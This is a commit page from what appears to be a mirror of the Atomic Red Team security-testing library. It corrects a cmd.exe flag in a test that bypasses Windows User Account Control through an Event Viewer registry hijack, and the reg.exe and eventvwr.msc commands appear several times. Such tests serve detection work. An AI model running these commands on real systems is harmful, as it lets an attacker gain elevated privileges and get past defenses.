security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2019-01-16 17:25:14 +00:00
parent 6b6f4beae5
commit 37ca7e5fd0
2 changed files with 3 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1088/T1088.md
+1 -1
View File
@@ -37,7 +37,7 @@ Bypasses User Account Control using Event Viewer and a relevant Windows Registry
#### Run it with `command_prompt`!
```
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe -c eventvwr.msc
cmd.exe /c eventvwr.msc
```
<br/>
<br/>
atomics/index.yaml
+2 -2
View File
@@ -4209,7 +4209,7 @@ defense-evasion:
name: command_prompt
command: |
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe -c eventvwr.msc
cmd.exe /c eventvwr.msc
- name: Bypass UAC using Event Viewer - PowerShell
description: 'PowerShell code to bypass User Account Control using Event Viewer
and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
@@ -9592,7 +9592,7 @@ privilege-escalation:
name: command_prompt
command: |
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe -c eventvwr.msc
cmd.exe /c eventvwr.msc
- name: Bypass UAC using Event Viewer - PowerShell
description: 'PowerShell code to bypass User Account Control using Event Viewer
and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/